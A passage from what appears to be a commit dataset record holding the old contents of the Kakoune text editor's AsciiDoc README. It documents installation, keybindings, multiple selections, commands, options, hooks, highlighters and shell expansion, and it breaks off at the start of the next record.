C\/CPP file to h\/hpp one.\n * *rc\/asciidoc.kak*: provides asciidoc files autodetection and highlighting\n * *rc\/diff.kak*: provides patches\/diff files autodetection and highlighting\n * *rc\/git.kak*: provides various git format highlighting (commit message editing,\n interactive rebase)\n * *rc\/git-tools.kak*: provides some git integration, like +:git-blame+, +:git-show+\n or +:git-diff-show+\n * *rc\/make.kak*: provides the +:make+ and +:errjump+ commands along with\n highlighting for compiler output.\n * *rc\/man.kak*: provides the +:man+ command\n * *rc\/grep.kak*: provides the +:grep+ and +:gjump+ commands along with highlighting\n for grep output.\n * *rc\/ctags.kak*: provides the +:tag+ command to jump on a tag definition using\n exuberant ctags files, this script requires the *readtags* binary, available\n in the exuberant ctags package but not installed by default.\n * *rc\/client.kak*: provides the +:new+ command to launch a new client on the current\n session, if tmux is detected, launch the client in a new tmux split, else\n launch in a new terminal emulator.\n * *rc\/clang.kak*: provides the +:clang-enable-autocomplete+ command for C\/CPP\n insert mode completion support. This requires the clang++ compiler to be\n available. You can use the +clang_options+ option to specify switches to\n be passed to the compiler.\n\nCertain command files defines options, such as +grepcmd+ (for +:grep+) +makecmd+\n(for +:make+) or +termcmd+ (for +:new+).\n\nSome options are shared with commands. +:grep+ and +:make+ honor the +toolsclient+ option,\nif specified, to open their buffer in it rather than the current client. man honor\nthe +docsclient+ option for the same purpose.\n","old_contents":"Kakoune\n=======\n\nIntroduction:\n-------------\n\nKakoune is a code editor heavily inspired by Vim, as such most of it's\ncommands are similar to vi's ones.\n\nKakoune can operate in two modes, normal and insertion. In insertion mode,\nkeys are directly inserted into the current buffer. In normal mode, keys\nare used to manipulate the current selection and to enter insertion mode.\n\nKakoune has a strong focus on interactivity, most commands provide immediate\nand incremental results, while still being competitive (as in keystroke count)\nwith Vim.\n\nKakoune works on selections, which are oriented, inclusive range of characters,\nselections have an anchor and a cursor character. Most commands move both of\nthem, except when extending selection where the anchor character stays fixed\nand the cursor one moves around.\n\nsee http:\/\/vimeo.com\/82711574\n\nJoin us on freenode IRC +#Kakoune+\n\nFeatures\n--------\n\n * Multiple selections as a central way of interacting\n * Powerful selection manipulation primitives\n - Select all regex matches in current selections\n - Keep selections containing\/not containing a match for a given regex\n - Split current selections with a regex\n - Text objects (paragraph, sentence, nestable blocks)\n * Powerful text manipulation primitives\n - Align selections\n - Rotate selection contents\n - Case manipulation\n - Indentation\n - Piping each selection to external filter\n * Client-Server architecture\n - Multiple clients on the same editing session\n - Use tmux or your X11 window manager to manage windows\n * Simple interaction with external programs\n * Automatic contextual help\n * Automatic as you type completion\n * Macros\n * Hooks\n * Syntax Highlighting\n\nBuilding\n--------\n\nKakoune dependencies are:\n\n * A C++11 compliant compiler (GCC >= 4.8.1 or clang >= 3.4)\n * boost (>= 1.50)\n * ncurses with wide-characters support (>= 5.3, generally refered as libncursesw)\n\nTo build, just type *make* in the src directory\n\nKakoune can be built on Linux, MacOS, and Cygwin. Due to Kakoune relying heavily\non being in an Unix like environment, no native Windows version is planned.\n\nTo setup a basic configuration on your account, type *make userconfig* in the\nsrc directory, this will setup an initial $XDG_CONFIG_HOME\/kak directory. See\nthe _Kakrc_ section for more information.\n\nInstalling\n----------\n\nIn order to install kak on your system, rather than running it directly from\nit's source directory, type *make install*, you can specify the +PREFIX+ and\n+DESTDIR+ if needed.\n\nNote that by default, no script files will be read if you do not add links\nto them in $XDG_CONFIG_HOME\/kak\/autoload. Available script files will be\ninstalled in $PREFIX\/share\/kak\/rc\n\nIf you want to enable all files, set $XDG_CONFIG_HOME\/kak\/autoload to be\na symbolic link to the $PREFIX\/share\/kak\/rc directory.\n\n----------------------------------------------\nln -s \/usr\/share\/kak\/rc ~\/.config\/kak\/autoload\n----------------------------------------------\n\nRunning\n-------\n\nJust running *kak* launch a new kak session with a client on local terminal.\n*kak* accepts some switches:\n\n * +-c <session>+: connect to given session, sessions are unix sockets\n +\/tmp\/kak-<session>+\n * +-e <commands>+: execute commands on startup\n * +-n+: ignore kakrc file\n * +-s <session>+: set the session name, by default it will be the pid\n of the initial kak process.\n * +-d+: run Kakoune in daemon mode, without user interface. This requires\n the session name to be specified with -s. In this mode, the Kakoune\n server will keep running even if there is no connected client, and\n will quit when receiving SIGTERM.\n * +-p <session>+: read stdin, and then send its content to the given session\n acting as a remote control.\n\nAt startup, if +-n+ is not specified, Kakoune will try to source the file\n..\/share\/kak\/kakrc relative to the kak binary. This kak file will then try\nto source $XDG_CONFIG_HOME\/kak\/kakrc (with $XDG_CONFIG_HOME defaulting to\n$HOME\/.config), and any files in $XDG_CONFIG_HOME\/kak\/autoload.\n\nThe common pattern is to add links to $XDG_CONFIG_HOME\/kak\/autoload to the\nscripts in $PREFIX\/share\/kak\/rc that the user wants sourced at kak launch.\n\nBasic Movement\n--------------\n\n * _space_: select the character under last selection end\n * _alt-space_: flip the selections direction\n\n * _h_: select the character on the right of selection end\n * _j_: select the character below the selection end\n * _k_: select the character above the selection end\n * _l_: select the character on the left of selection end\n\n * _w_: select the word and following whitespaces on the right of selection end\n * _b_: select preceding whitespaces and the word on the left of selection end\n * _e_: select preceding whitespaces and the word on the right of selection end\n * _alt-[wbe]_: same as [wbe] but select WORD instead of word\n\n * _x_: select line on which selection end lies (or next line when end lies on\n an end-of-line)\n * _alt-x_: expand selections to contain full lines (including end-of-lines)\n * _alt-X_: trim selections to only contain full lines (not including last\n end-of-line)\n\n * _%_: select whole buffer\n\n * _alt-H_: select to line begin\n * _alt-L_: select to line end\n\n * _\/_: search (select next match)\n * _?_: search (extend to next match)\n * _n_: select next match\n * _N_: add a new selection with next match\n * _alt-n_: replace main selection with next match (preserving the others)\n\n * _pageup_: scroll up\n * _pagedown_: scroll down\n\n * _alt-r_: rotate selections (the main selection becomes the next one)\n\nA word is a sequence of alphanumeric characters or underscore, a WORD is a\nsequence of non whitespace characters.\n\nAppending\n---------\n\nfor most selection commands, using shift permits to extend current selection\ninstead of replacing it. for example, _wWW_ selects 3 consecutive words\n\nUsing Counts\n------------\n\nMost selection commands also support counts, which are entered before the\ncommand itself.\n\nfor example, _3W_ selects 3 consecutive words and _3w_ select the third word on\nthe right of selection end.\n\n * _space_: when used with count, keep only the counth selection\n * _alt-space_: when used with count, remove the counth selection\n\nChanges\n-------\n\n * _i_: insert before current selection\n * _a_: insert after current selection\n * _d_: yank and delete current selection\n * _D_: yank concatenated and delete current selection (see _Y_)\n * _c_: yank and delete current selection and insert\n * _._: repeat last insert mode change (_i_, _a_, or _c_, including\n the inserted text)\n\n * _I_: insert at current selection begin line start\n * _A_: insert at current selection end line end\n * _o_: insert in a new line below current selection end\n * _O_: insert in a new line above current selection begin\n\n * _y_: yank selections\n * _Y_: yank selections concatenated (only one yank, containing\n all selection concatenated)\n * _p_: paste after current selection end\n * _P_: paste before current selection begin\n * _alt-p_: replace current selection with yanked text\n\n * _alt-j_: join selected lines\n * _alt-J_: join selected lines and select spaces inserted\n in place of line breaks\n\n * _>_: indent selected lines\n * _<_: deindent selected lines\n * _alt->_: indent selected lines, including empty lines\n * _<_: deindent selected lines\n * _alt-<_: deindent selected lines, do not remove incomplete\n indent (3 leading spaces when indent is 4)\n\n * _|_: pipe each selections through the given external filter program\n and replace the selection with it's output.\n * _alt-|_: pipe each selections through the given external filter program\n and append the selection with it's output.\n\n * _u_: undo last change\n * _U_: redo last change\n\n * _r_: replace each character with the next entered one\n * _&_: align selection, align the cursor of selections by inserting\n spaces before the first character of the selection\n * _alt-&_: copy indent, copy the indentation of the main selection\n (or the count one if a count is given) to all other ones\n\n * _`_: to lower case\n * _~_: to upper case\n * _alt-`_: swap case\n\n * _@_: convert tabs to spaces in current selections, uses the buffer\n tabstop option or the count parameter for tabstop.\n * _alt-@_: convert spaces to tabs in current selections, uses the buffer\n tabstop option or the count parameter for tabstop.\n\n * _alt-R_: rotate selections content, if specified, the count groups\n selections, so +3<a-R>+ rotate (1, 2, 3) and (3, 4, 6)\n independently.\n\nGoto Commands\n-------------\n\nCommands begining with g are used to goto certain position and or buffer:\n\n * _gh_: select to line begin\n * _gl_: select to line end\n\n * _gg_, _gk_: go to the first line\n * _gj_: go to the last line\n\n * _gt_, _gk_: go to the first displayed line\n * _gc_, _gk_: go to the middle displayed line\n * _gb_: go to the last displayed line\n\n * _ga_: go to the previous (alternate) buffer\n * _gf_: open the file whose name is selected\n\n * _g._: go to last buffer modifiction position\n\nView commands\n-------------\n\nSome commands, all begining with v permit to manipulate the current\nview.\n\n * _vv_ or _vc_: center the main selection in the window\n * _vt_: scroll to put the main selection on the top line of the window\n * _vb_: scroll to put the main selection on the bottom line of the window\n * _vh_: scroll the window count columns left\n * _vj_: scroll the window count line downward\n * _vk_: scroll the window count line upward\n * _vl_: scroll the window count columns right\n\nJump list\n---------\n\nSome commands, like the goto commands, buffer switch or search commands,\npush the previous selections to the client's jump list. It is possible\nto forward or backward in the jump list using:\n\n * _control-i_: Jump forward\n * _control-o_: Jump backward\n * _control-s_: save current selections\n\nMulti Selection\n---------------\n\nKak was designed from the start to handle multiple selections.\nOne way to get a multiselection is via the _s_ key.\n\nFor example, to change all occurences of word 'roger' to word 'marcel'\nin a paragraph, here is what can be done:\n\nselect the paragraph with enough _x_. press _s_ and enter roger then enter.\nnow paragraph selection was replaced with multiselection of each roger in\nthe paragraph. press _c_ and marcel<esc> to replace rogers with marcels.\n\nA multiselection can also be obtained with _S_, which splits the current\nselection according to the regex entered. To split a comma separated list,\nuse _S_ then ', *'\n\n_s_ and _S_ share the search pattern with _\/_, and hence entering an empty\npattern uses the last one.\n\nAs a convenience, _alt-s_ allows you to split the current selections on\nline boundaries.\n\nTo clear multiple selections, use _space_. To keep only the nth selection\nuse _n_ followed by _space_, to remove only the nth selection, use _n_\nfollowed by _alt-space_.\n\n_alt-k_ allows you to enter a regex and keep only the selections that\ncontains a match for this regex. using _alt-K_ you can keep the selections\nnot containing a match.\n\n_$_ allows you to enter a shell command and pipe each selections to it.\nSelections whose shell command returns 0 will be kept, other will be dropped.\n\nObject Selection\n----------------\n\nSome keys allow you to select a text object:\n\n * _alt-a_: selects the whole object\n * _alt-i_: selects the inner object, that is the object excluding it's surrounder.\n for example, for a quoted string, this will not select the quote, and\n for a word this will not select trailing spaces.\n * _[_: selects to object start\n * _]_: selects to object end\n * _{_: extends selections to object start\n * _}_: extends selections to object end\n\nAfter this key, you need to enter a second key in order to specify which\nobject you want.\n\n * _b_, _(_ or _)_: select the enclosing parenthesis\n * _B_, _{_ or _}_: select the enclosing {} block\n * _r_, _[_ or _]_: select the enclosing [] block\n * _a_, _<_ or _>_: select the enclosing <> block\n * _\"_: select the enclosing double quoted string\n * _'_: select the enclosing single quoted string\n * _`_: select the enclosing grave quoted string\n * _w_: select the whole word\n * _W_: select the whole WORD\n * _s_: select the sentence\n * _p_: select the paragraph\n * _i_: select the current indentation block\n * _n_: select the number\n\nFor nestable objects, a count can be used in order to specify which surrounding\nlevel to select.\n\nRegisters\n---------\n\nregisters are named list of text. They are used for various purpose, like\nstoring the last yanked test, or the captures groups associated with the\nselections.\n\nWhile in insert mode, ctrl-r followed by a register name (one character)\ninserts it.\n\nFor example, ctrl-r followed by \" will insert the currently yanked text.\nctrl-r followed by 2 will insert the second capture group from the last regex\nselection.\n\nRegisters are lists, instead of simply text in order to interact well with\nmultiselection. Each selection have it's own captures, or yank buffer.\n\nMacros\n------\n\nKakoune can record and replay a sequence of key press.\n\nWhen pressing the _Q_ key, followed by an alphabetic key for the macro name,\nKakoune begins macro recording: every pressed keys will be added to the\nmacro until the _Q_ key is pressed again.\n\nTo replay a macro, use the _q_ key, followed by the macro name.\n\nSearch selection\n----------------\n\nUsing the _*_ key, you can set the search pattern to the current selection.\nThis tries to be intelligent. It will for example detect if current selection\nbegins and\/or end at word boundaries, and set the search pattern accordingly.\n\nwith _alt-*_ you can set the search pattern to the current seletion without\nKakoune trying to be smart.\n\nBasic Commands\n--------------\n\nCommands are entered using +:+.\n\n * +e[dit] <filename> [<line> [<column>]]+: open buffer on file, go to given\n line and column. If file is already opened, just switch to this file.\n use edit! to force reloading.\n * +w[rite] [<filename>]+: write buffer to <filename> or use it's name if\n filename is not given.\n * +q[uit]+: exit Kakoune, use quit! to force quitting even if there is some\n unsaved buffers remaining.\n * +wq+: write current buffer and quit\n * +b[uffer] <name>+: switch to buffer <name>\n * +d[el]b[uf] [<name>]+: delete the buffer <name>, use d[el]b[uf]! to force\n deleting a modified buffer.\n * +source <filename>+: execute commands in <filename>\n * +runtime <filename>+: execute commands in <filename>, <filename>\n is relative to kak executable path.\n * +nameclient <name>+: set current client name\n * +namebuf <name>+: set current buffer name\n * +echo <text>+: show <text> in status line\n * +nop+: does nothing, but as with every other commands, arguments may be\n evaluated. So nop can be used for example to execute a shell command\n while being sure that it's output will not be interpreted by kak.\n +:%sh{ echo echo tchou }+ will echo tchou in Kakoune, whereas\n +:nop %sh{ echo echo tchou }+ will not, but both will execute the\n shell command.\n\nExec and Eval\n-------------\n\nthe +:exec+ and +:eval+ commands can be used for running Kakoune commands.\n+:exec+ keys as if they were pressed, whereas +:eval+ executes it's given\nparemeters as if they were entered in the command prompt. By default,\nthey do their execution in the context of the current client.\n\nSome parameters provide a way to change the context of execution:\n\n * +-client <name>+: execute in the context of the client named <name>\n * +-try-client <name>+: execute in the context of the client named\n <name> if such client exists, or else in the current context.\n * +-draft+: execute in a copy of the context of the selected client\n modifications to the selections or input state will not affect\n the client. This permits to make some modification to the buffer\n without modifying the user's selection.\n * +-itersel+ (requires +-draft+): execute once per selection, in a\n context with only the considered selection. This permits to avoid\n cases where the selections may get merged.\n * +-buffer <names>+: execute in the context of each buffers in the\n comma separated list <names>\n * +-no-hooks+: disable hook execution while executing the keys\/commands\n\nThe execution stops when the last key\/command is reached, or an error\nis raised.\n\nkey parameters gets concatenated, so the following commands are equivalent.\n\n----------------------\n:exec otest<space>1\n:exec o test <space> 1\n----------------------\n\nString syntax\n-------------\n\nWhen entering a command, parameters are separated by whitespace (shell like),\nif you want to give parameters with spaces, you should quote them.\n\nKakoune support three string syntax:\n\n * +\"strings\" and \\'strings\\'+: classic strings, use \\' or \\\" to escape the\n separator.\n\n * +%\\{strings\\}+: these strings are very useful when entering commands\n\n - the '{' and '}' delimiter are configurable: you can use any non\n alphanumeric character. like %[string], %<string>, %(string), %~string~\n or %!string!...\n - if the character following the % is one of {[(<, then the closing one is\n the matching }])> and the delimiters are not escapable but are nestable.\n for example +%{ roger {}; }+ is a valid string, +%{ marcel \\}+ as well.\n\nOptions\n-------\n\nFor user configuration, Kakoune supports options.\n\nOptions are typed, their type can be\n\n * +int+: an integer number\n * +bool+: a boolean value, +yes\/true+ or +no\/false+\n * +yesnoask+: similar to a boolean, but the additional\n value +ask+ is supported.\n * +str+: a string, some freeform text\n * +regex+: as a string but the +set+ commands will complain\n if the entered text is not a valid regex.\n * +{int,str}-list+: a list, elements are separated by a colon (:)\n if an element needs to contain a colon, it can be escaped with a\n backslash.\n\nOptions value can be changed using the +set+ commands:\n\n--------------------------------------------------------------\n:set [global,buffer,window] <option> <value> # buffer, window, or global scope\n--------------------------------------------------------------\n\nOption values can be different by scope, an option can have a global\nvalue, a buffer value and a window value. The effective value of an\noption depends on the current context. If we have a window in the\ncontext (interactive edition for example), then the window value\n(if any) is used, if not we try the buffer value (if we have a buffer\nin the context), and if not we use the global value.\n\nThat means that two windows on the same buffer can use different options\n(like different filetype, or different tabstop). However some options\nmight end up ignored if their scope is not in the command context:\n\nWriting a file never uses the window options for example, so any\noptions related to writing wont be taken into account if set in the\nwindow scope (+BOM+ or +eolformat+ for example).\n\nNew options can be declared using the +:decl+ command:\n\n---------------------------------------\n:decl [-hidden] <type> <name> [<value>]\n---------------------------------------\n\nthe +-hidden+ parameter makes the option invisible in completion, but\nstill modifiable.\n\nSome options are built in Kakoune, and can be used to control it's behaviour:\n\n * +tabstop+ _int_: width of a tab character.\n * +indentwidth+ _int_: width (in spaces) used for indentation.\n 0 means a tab character.\n * +scrolloff+ _int_: number of lines to keep visible above\/below\n the cursor when scrolling.\n * +eolformat+ _string_ ('lf' or 'crlf'): the format of end of lines when\n writing a buffer, this is autodetected on load.\n * +BOM+ _string_ (\"no\" or \"utf-8\"): define if the file should be written\n with an unicode byte order mark.\n * +complete_prefix+ _bool_: when completing in command line, and multiple\n candidates exist, enable completion with common prefix.\n * +incsearch+ _bool_: execute search as it is typed\n * +aligntab+ _bool_: use tabs for alignement command\n * +autoinfo+ _bool_: display automatic information box for certain commands.\n * +autoshowcompl+ _bool_: automatically display possible completions when\n editing a prompt.\n * +ignored_files+ _regex_: filenames matching this regex wont be considered\n as candidates on filename completion (except if the text being completed\n already matches it).\n * +filetype+ _str_: arbitrary string defining the type of the file\n filetype dependant actions should hook on this option changing for\n activation\/deactivation.\n * +path+ _str-list_: directories to search for gf command.\n * +completers+ _str-list_: completion systems to use for insert mode\n completion. given completers are tried in order until one generate some\n completion candidates. Existing completers are:\n - +word=all+ or +word=buffer+ which complete using words in all buffers\n (+word=all+) or only the current one (+word=buffer+)\n - +filename+ which tries to detect when a filename is being entered and\n provides completion based on local filesystem.\n - +option=<opt-name>+ where <opt-name> is a _str-list_ option. The first\n element of the list should follow the format:\n _<line>.<column>[+<length>]@<timestamp>_ to define where the completion\n apply in the buffer, and the other strings are the candidates.\n * +autoreload+ _yesnoask_: auto reload the buffers when an external\n modification is detected.\n\nInsert mode completion\n----------------------\n\nKakoune can propose completions while inserting text, the +completers+ option\ncontrol automatic completion, which kicks in when a certain idle timeout is\nreached (100 milliseconds). Insert mode completion can be explicitely triggered\nusing *control-x*, followed, by:\n\n * *f* : filename completion\n * *w* : buffer word completion\n * *l* : buffer line completion\n * *o* : option based completion\n\nHighlighters\n------------\n\nManipulation of the displayed text is done through highlighters, which can be added\nor removed with the command\n\n-----------------------------------------------------\n:addhl <highlighter_name> <highlighter_parameters...>\n-----------------------------------------------------\n\nand\n\n----------------------\n:rmhl <highlighter_id>\n----------------------\n\nexisting highlighters are:\n\n * +number_lines+: show line numbers\n * +group <group_name>+: highlighter group, containing other highlighters.\n useful when multiple highlighters work together and need to be\n removed as one. Adding and removing from a group can be done using\n `:addhl -group <group> <highlighter_name> <highlighter_parameters...>`\n `:rmhl -group <group> <highlighter_name>`\n * +regex <ex> <color>...+: highlight a regex, takes the regex as first parameter,\n followed by any number of color parameters. color format is:\n <capture_id>:<fg_color>[,<bg_color>]\n For example: `:addhl regex \/\/(\\h+TODO:)?[^\\n]+ 0:cyan 1:yellow,red`\n will highlight C++ style comments in cyan, with an eventual 'TODO:' in\n yellow on red background.\n * +search <color>+: highlight every matches to the current search pattern. takes\n one parameter for the color to apply to highlighted elements.\n * +flag_lines <flag> <option_name>+: add a column in front of text, and display the\n given flag in it for everly lines contained in the int-list option named\n <option_name>.\n * +show_matching+: highlight matching char of the character under the selections\n cursor using +MatchingChar+ color alias.\n\nShared Highlighters\n~~~~~~~~~~~~~~~~~~~\n\nHighlighters are often defined for a specific filetype, and it makes then sense to\nshare the highlighters between all the windows on the same filetypes.\n\nA shared highlighter can be defined with\n\n-----------------------\ndefhl <shared_hl_name>\n-----------------------\n\nHighlighters can be added to it using the regular +:addhl+ command, with the\n+-def-group <shared_hl_name>+ option.\n\nIt can then be referenced in a window using the +ref+ highlighter.\n\n--------------------------\naddhl ref <shared_hl_name>\n--------------------------\n\nHooks\n-----\n\ncommands can be registred to be executed when certain events arise.\nto register a hook, use the hook command.\n\n------------------------------------------------------\n:hook <scope> <hook_name> <filtering_regex> <commands>\n------------------------------------------------------\n\n<scope> can be either global, buffer or window (or any of their prefixes),\nthe scope are hierarchical, meaning that a Window calling a hook will\nexecute it's own, the buffer ones and the global ones.\n\n<command> is a string containing the commands to execute when the hook is\ncalled.\n\nfor example, to automatically use line numbering with .cc files,\nuse the following command:\n\n-----------------------------------------------------\n:hook global WinCreate .*\\.cc %{ addhl number_lines }\n-----------------------------------------------------\n\nexisting hooks are:\n\n * +NormalIdle+: A certain duration has passed since last key was pressed in\n normal mode.\n * +NormalBegin+: Entering normal mode\n * +NormalEnd+: Leaving normal mode\n * +NormalKey+: A key is received in normal mode, the key is used for filtering\n * +InsertIdle+: A certain duration has passed since last key was pressed in\n insert mode.\n * +InsertBegin+: Entering insert mode\n * +InsertEnd+: Leaving insert mode\n * +InsertKey+: A key is received in insert mode, the key is used for filtering\n * +InsertMove+: The cursor moved (without inserting) in insert mode, the key\n that triggered the move is used for filtering\n * +WinCreate+: A window was created, the filtering text is the buffer name\n * +WinClose+: A window was detroyed, the filtering text is the buffer name\n * +WinDisplay+: A window was bound a client, the filtering text is the buffer\n name\n * +WinSetOption+: An option was set in a window context, the filtering text\n is '<option_name>=<new_value>'\n * +BufSetOption+: An option was set in a buffer context, the filtering text\n is '<option_name>=<new_value>'\n * +BufNew+: A buffer for a new file has been created, filename is used for\n filtering\n * +BufOpen+: A buffer for an existing file has been created, filename is\n used for filtering\n * +BufCreate+: A buffer has been created, filename is used for filtering\n * +BufWritePre+: Executre just before a buffer is written, filename is\n used for filtering.\n * +BufWritePost+: Executre just after a buffer is written, filename is\n used for filtering.\n * +RuntimeError+: an error was encountered while executing an user command\n the error message is used for filtering\n * +KakBegin+: Kakoune started, this is called just after reading the user\n configuration files\n * +KakEnd+: Kakoune is quitting.\n\nwhen not specified, the filtering text is an empty string.\n\nKey Mapping\n-----------\n\nYou can redefine keys meaning using the map command\n\n------------------------------------------------------\n:map <scope> <mode> <key> <keys>\n------------------------------------------------------\n\nwith +scope+ being one of +global, buffer or window+ (or any prefix),\nmode being +insert, normal, prompt or menu+ (or any prefix), +key+ being\na single key name and +keys+ a list of keys.\n\nColor Aliases\n-------------\n\nColorspec takes the form <fg_color>[,<bg_color>], they can be named using the\nfollowing command.\n\n--------------------------\n:colalias <name> <colspec>\n--------------------------\n\nnote that colspec can itself be a color alias.\n\nUsing color alias instead of colorspec permits to change the effective colors\nafterward.\n\nthere are some builtins color aliases:\n\n * +PrimarySelection+: main selection color for every selected character except\n the cursor\n * +SecondarySelection+: secondary selection color for every selected character\n except the cursor\n * +PrimaryCursor+: cursor of the primary selection\n * +SecondaryCursor+: cursor of the secondary selection\n * +LineNumbers+: colors used by the number_lines highlighter\n * +MenuForeground+: colors for the selected element in menus\n * +MenuBackground+: colors for the not selected elements in menus\n * +Information+: colors the informations windows and information messages\n * +Error+: colors of error messages\n * +StatusLine+: colors used for the status line\n * +StatusCursor+: colors used for the status line cursor\n * +Prompt+: colors used prompt displayed on the status line\n\nShell expansion\n---------------\n\nA special string syntax is supported which replace it's content with the\noutput of the shell commands in it, it is similar to the shell $(...)\nsyntax and is evaluated only when needed.\nfor example: %sh{ ls } is replaced with the output of the ls command.\n\nSome of Kakoune state is available through environment variables:\n\n * +kak_selection+: content of the main selection\n * +kak_selections+: content of the selection separated by colons, colons in\n the selection contents are escapted with a backslash.\n * +kak_bufname+: name of the current buffer\n * +kak_timestamp+: timestamp of the current buffer, the timestamp is an\n integer value which is incremented each time the buffer is modified.\n * +kak_runtime+: directory containing the kak binary\n * +kak_opt_<name>+: value of option <name>\n * +kak_reg_<r>+: value of register <r>\n * +kak_socket+: filename of session socket (\/tmp\/kak-<session>)\n * +kak_client+: name of current client\n * +kak_cursor_line+: line of the end of the main selection\n * +kak_cursor_column+: column of the end of the main selection (in byte)\n * +kak_cursor_char_column+: column of the end of the main selection (in character)\n * +kak_hook_param+: filtering text passed to the currently executing hook\n\nNote that in order to make only needed information available, Kakoune needs\nto find the environment variable reference in the shell script executed.\nHence +%sh{ .\/script.sh }+ with +script.sh+ referencing an environment\nvariable will not work.\n\nfor example you can print informations on the current file in the status\nline using:\n\n-------------------------------\n:echo %sh{ ls -l $kak_bufname }\n-------------------------------\n\nRegister and Option expansion\n-----------------------------\n\nSimilar to shell expansion, register contents and options values can be\naccessed through %reg{<register>} and %opt{<option>} syntax.\n\nfor example you can display last search pattern with\n\n-------------\n:echo %reg{\/}\n-------------\n\nDefining Commands\n-----------------\n\nnew commands can be defined using the +:def+ command.\n\n------------------------------\n:def <command_name> <commands>\n------------------------------\n\n<commands> is a string containing the commands to execute\n\ndef can also takes some flags:\n\n * +-env-params+: pass parameters given to commands in the environment as\n kak_paramN with N the parameter number\n * +-shell-params+: pass parameters given to commands as positional parameters\n to any shell expansions used in the command.\n * +-file-completion+: try file completion on any parameter passed\n to this command\n * +-shell-completion+: following string is a shell command which takes\n parameters as positional params and output one\n completion candidate per line.\n * +-allow-override+: allow the new command to replace an exisiting one\n with the same name.\n * +-hidden+: do not show the command in command name completions\n * +-docstring+: define the documentation string for the command\n\nUsing shell expansion permits to define complex commands or to access\nKakoune state:\n\n------------------------------------------------------\n:def print_selection %{ echo %sh{ ${kak_selection} } }\n------------------------------------------------------\n\nSome helper commands can be used to define composite commands:\n\n * +:prompt <prompt> <register> <command>+: Prompt the user for a string, when\n the user validates, store the result in given <register> and run <commmand>.\n the -init <str> switch allows setting initial content. \n * +:menu <label1> <commands1> <label2> <commands2>...+: display a menu using\n labels, the selected label's commands are executed.\n +menu+ can take a -auto-single argument, to automatically run commands\n when only one choice is provided. and a -select-cmds argument, in which\n case menu takes three argument per item, the last one being a command\n to execute when the item is selected (but not validated).\n * +:info <text>+: display text in an information box, at can take a -anchor\n option, which accepts +left+, +right+ and +cursor+ as value, in order to\n specify where the info box should be anchored relative to the main selection.\n * +:try <commands> catch <on_error_commands>+: prevent an error in <commands>\n from aborting the whole commands execution, execute <on_error_commands>\n instead. If nothing is to be done on error, the catch part can be ommitted.\n * +:reg <name> <content>+: set register <name> to <content>\n\nNote that these commands are available in interactive command mode, but are\nnot that useful in this context.\n\nFIFO Buffer\n-----------\n\nthe +:edit+ command can take a -fifo parameter:\n\n-----------------------------------\n:edit -fifo <filename> <buffername>\n-----------------------------------\n\nin this case, a buffer named +<buffername>+ is created which reads its content\nfrom fifo +<filename>+. When the fifo is written to, the buffer is automatically\nupdated.\n\nThis is very useful for running some commands asynchronously while displaying\ntheir result in a buffer. See rc\/make.kak and rc\/grep.kak for examples.\n\nWhen the buffer is deleted, the fifo will be closed, so any program writing\nto it will receive SIGPIPE. This is usefull as it permits to stop the writing\nprogram when the buffer is deleted.\n\nMenus\n-----\n\nWhen a menu is displayed, you can use *j*, *control-n* or *tab* to select the next\nentry, and *k*, *control-p* or *shift-tab* to select the previous one.\n\nUsing the *\/* key, you can enter some regex in order to restrict available choices\nto the matching ones.\n\nKakrc\n-----\n\nThe kakrc file next to the kak binary (in the src directory for the moment)\nis a list of kak commands to be executed at startup.\n\nThe current behaviour is to execute local user commands in the file\n$HOME\/.config\/kak\/kakrc and in all files in $HOME\/.config\/kak\/autoload\ndirectory\n\nPlace links to the files in src\/rc\/ in your autoload directory in order to\nexecute them on startup, or use the runtime command (which sources relative\nto the kak binary) to load them on demand.\n\nExisting commands files are:\n\n * *rc\/kakrc.kak*: provides kak commands files autodetection and highlighting\n * *rc\/cpp.kak*: provides C\/CPP files autodetection and highlighting and the\n +:alt+ command for switching from C\/CPP file to h\/hpp one.\n * *rc\/asciidoc.kak*: provides asciidoc files autodetection and highlighting\n * *rc\/diff.kak*: provides patches\/diff files autodetection and highlighting\n * *rc\/git.kak*: provides various git format highlighting (commit message editing,\n interactive rebase)\n * *rc\/git-tools.kak*: provides some git integration, like +:git-blame+, +:git-show+\n or +:git-diff-show+\n * *rc\/make.kak*: provides the +:make+ and +:errjump+ commands along with\n highlighting for compiler output.\n * *rc\/man.kak*: provides the +:man+ command\n * *rc\/grep.kak*: provides the +:grep+ and +:gjump+ commands along with highlighting\n for grep output.\n * *rc\/ctags.kak*: provides the +:tag+ command to jump on a tag definition using\n exuberant ctags files, this script requires the *readtags* binary, available\n in the exuberant ctags package but not installed by default.\n * *rc\/client.kak*: provides the +:new+ command to launch a new client on the current\n session, if tmux is detected, launch the client in a new tmux split, else\n launch in a new terminal emulator.\n * *rc\/clang.kak*: provides the +:clang-enable-autocomplete+ command for C\/CPP\n insert mode completion support. This requires the clang++ compiler to be\n available. You can use the +clang_options+ option to specify switches to\n be passed to the compiler.\n\nCertain command files defines options, such as +grepcmd+ (for +:grep+) +makecmd+\n(for +:make+) or +termcmd+ (for +:new+).\n\nSome options are shared with commands. +:grep+ and +:make+ honor the +toolsclient+ option,\nif specified, to open their buffer in it rather than the current client. man honor\nthe +docsclient+ option for the same purpose.\n","returncode":0,"stderr":"","license":"unlicense","lang":"AsciiDoc"} {"commit":"d04438c874cafd19b6dd62680b008e376094aea0","subject":"fixed reference to Maven version","message":"fixed reference to Maven 